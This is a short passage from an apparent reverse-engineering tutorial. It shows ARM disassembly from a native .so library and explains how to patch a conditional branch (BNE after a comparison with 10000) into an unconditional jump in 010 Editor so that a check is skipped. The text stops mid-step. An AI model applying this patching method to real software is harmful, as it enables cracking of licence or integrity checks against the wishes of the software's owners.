3)) It can be seen that it is basically the same as the source code above, so now many algorithm libraries must be packed, otherwise it is easy to be cracked;

What we want to do is actually reverse if (v5 == 10000), so that we can succeed;

4) Here is the key code:

loc_4346
11 98 LDR R0, [SP,#0x80+var_3C]
16 90 STR R0, [SP,#0x80+var_28]
16 99 LDR R1, [SP,#0x80+var_28]
42 F2 10 72 MOVW R2, #0x2710
91 42 CMP R1, R2
1C D1 BNE loc_438E

5) > BNE means that if R1 and R2 are not equal, the CMP comparison instruction on the previous line jumps to loc_438E, and the output will fail. Of course, if the values are not equal after normal operation.

6)It can be seen that the hexadecimal machine code corresponding to the jump instruction B is E7. What we have to do now is to change the instruction at 4350 to B loc_4356, which means to jump directly to the normal place without judging the CMP instruction on the previous line.

Use the 010 Editor to modify the so

> part 1 done

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁